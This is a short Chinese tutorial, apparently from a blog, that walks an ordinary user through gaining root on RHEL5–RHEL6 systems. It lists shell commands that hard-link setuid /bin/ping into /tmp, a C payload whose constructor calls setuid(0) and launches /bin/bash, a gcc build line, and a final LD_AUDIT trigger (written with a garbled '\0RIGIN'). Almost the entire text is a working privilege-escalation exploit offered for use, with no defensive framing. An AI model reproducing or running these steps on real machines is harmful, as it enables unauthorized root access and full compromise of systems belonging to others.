说明:RHEL5—RHEL6下  都可以提权


1. ls -ld /tmp/

 wKiom1jcsL7xlqDBAAAKUzr5J18247.png


2. ls -l /bin/ping

 wKiom1jcsMrDoaTdAAAKvfmLvNk201.png


3. mkdir /tmp/exploit ; ln /bin/ping /tmp/exploit/target

 wKioL1jcsN2RT6TeAAAW9K04s2g177.png


4. exec 3< /tmp/exploit/target ;  rm -rf /tmp/exploit/ ; ls -l /proc/$$/fd/3


 wKioL1jcsOmDB4oEAAAGxA0fA14971.png


 wKiom1jcsTrxwR1HAAAYqGaKG6Q652.png 


5. vim payload.c

   void __attribute__((constructor)) init()

   {

    setuid(0);

    system("/bin/bash");

   }


 wKiom1jcsQKCxi26AAAL8-Sn-Jo176.png

 

6. gcc -w -fPIC -shared -o /tmp/exploit payload.c ; ls -l /tmp/exploit

 wKioL1jcsRDBmz2nAAATkJ1fSE0254.png



7. LD_AUDIT="\0RIGIN" exec /proc/self/fd/3

 普通用户提权_第1张图片